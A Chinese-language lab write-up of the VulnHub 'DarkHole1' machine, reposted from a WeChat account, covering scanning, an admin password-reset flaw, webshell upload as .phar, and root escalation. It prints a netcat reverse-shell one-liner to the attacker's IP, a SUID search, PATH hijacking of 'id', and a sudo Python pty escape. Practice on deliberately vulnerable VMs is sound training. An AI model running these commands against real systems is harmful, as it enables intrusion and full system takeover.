DarkHole1

admin 2025年3月21日10:41:07评论4 views字数 1446阅读4分49秒阅读模式

下载地址:https://download.vulnhub.com/darkhole/DarkHole.zip

攻击者IP:172.20.134.149 natvmare

受害者IP:172.20.134.142 nat wmare

参考:https://blog.csdn.net/MRS_jianai/article/details/128497960

https://blog.csdn.net/Perpetual_Blue/article/details/124265351

主机发现

DarkHole1

端口扫描

DarkHole1

目录扫描

DarkHole1

http://172.20.134.142/login.php

注册一个账号后登录

DarkHole1

登陆后的页面,可能存在sql或任意用户密码重置等逻辑漏洞

DarkHole1

sql注入防护的很严实

DarkHole1

DarkHole1

重置一下id=1的密码,盲猜用户名是admin

DarkHole1

admin/root

DarkHole1

文件上传

参考:https://zh.wikipedia.org/wiki/PHAR_(%E6%96%87%E4%BB%B6%E6%A0%BC%E5%BC%8F)

https://websec.readthedocs.io/zh/latest/language/php/phar.html

https://www.php.net/manual/en/book.phar.php

phar(PHP Archive)文件是一种打包格式,将PHP代码文件和其他资源放入一个文件中来实现应用程序和库的分发。

在来自Secarma的安全研究员Sam Thomas在18年的Black Hat上提出后利用方式后,开始受到广泛的关注。

Phar可利用是因为Phar以序列化的形式存储用户自定义的meta-data,而以流的形式打开的时候,会自动反序列化,从而触发对应的攻击载荷。

或者使用phtml

PHTML文件扩展名通常与PHP脚本相关联,它允许在HTML文件中嵌入PHP代码。

https://stackoverflow.com/questions/11859015/what-is-phtml-and-when-should-i-use-a-phtml-extension-rather-than-php

将php改成phar上传

DarkHole1

蚁剑反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 172.20.134.129 1111 >/tmp/f

DarkHole1

反弹成功

DarkHole1

查找suid权限

find / -user root -perm -4000 -print 2>/dev/null

DarkHole1

发现

/home/john/toto

执行后是john用户执行了id命令

DarkHole1

命令劫持

cd /tmp# 切换到/tmp 目录echo "/bin/bash" > id# 将命令写入文件 id 中chmod +x id# 修改文件权限,增加执行权限export PATH=/tmp:$PATH # 添加/tmp 目录到 PATH 变量中which id# 查看 id 命令的路径

DarkHole1

执行toto

DarkHole1

方法1

发现用户darkhole的密码,直接修改root密码,切换root

DarkHole1

方法2:

root123同时也是john的密码

sudo -l

发现john可以以root的身份执行file这个python文件:

在file.py里面写一段打开shell的代码,再以root的身份执行

echo "import pty;pty.spawn('/bin/bash')" > file.pysudo python3 /home/john/file.py

DarkHole1

原文始发于微信公众号(王之暴龙战神):DarkHole1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月21日10:41:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DarkHole1https://cn-sec.com/archives/3865530.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息